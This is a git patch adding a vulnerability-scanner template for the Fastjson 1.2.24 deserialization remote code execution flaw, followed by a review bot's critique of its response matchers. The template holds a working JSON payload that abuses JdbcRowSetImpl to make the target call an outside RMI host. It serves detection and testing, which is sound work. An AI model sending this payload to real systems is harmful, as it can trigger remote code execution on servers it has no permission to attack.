From 16ea26b2959de3c1103c2e6ae2073919605e663e Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 11 Oct 2021 01:16:37 +0530
Subject: [PATCH] Added Fastjson 1.2.24 Deserialization RCE
---
.../fastjson/fastjson-1224-rce.yaml | 39 +++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 vulnerabilities/fastjson/fastjson-1224-rce.yaml
diff --git a/vulnerabilities/fastjson/fastjson-1224-rce.yaml b/vulnerabilities/fastjson/fastjson-1224-rce.yaml
new file mode 100644
index 0000000000..5740b7204c
--- /dev/null
+++ b/vulnerabilities/fastjson/fastjson-1224-rce.yaml
@@ -0,0 +1,39 @@
+id: fastjson-1224-rce
+
+info:
+ name: Fastjson 1.2.24 Deserialization RCE
+ author: zh
+ severity: critical
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
+ - https://www.freebuf.com/vuls/208339.html
+ - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
+ tags: fastjson,rce,deserialization
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {
+ "b":{
+ "@type":"com.sun.rowset.JdbcRowSetImpl",
+ "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
+ "autoCommit":true
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms DNS Interaction
+ words:
+ - "dns"
+
+ - type: word
+ condition: and
+ words:
+ - "Internal Server Error"
+ - "500"
\ No newline at end of file
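Review bot: The second matcher searches for the strings `"500"` and `"Internal Server Error"` without a `part`, so it is presumably evaluated against the response body rather than the status line. That misses affected servers that return a custom or empty error page, and it can match any body that merely contains "500". A `type: status` matcher with `status: [500]` would state the intent directly. Because `matchers-condition: and` ties that check to the callback, it is also worth deciding whether the error page should be required at all. The `interactsh_protocol` hit on `dns` shows only that the target resolved the callback name, meaning the `JdbcRowSetImpl` lookup was triggered; it does not show that code ran, so the `info` block should gain a `description` saying this, so that a `critical` result is triaged as an indicator to confirm against the deployed fastjson version. The request is sent only to `/`, so JSON endpoints on other paths are not covered by this template.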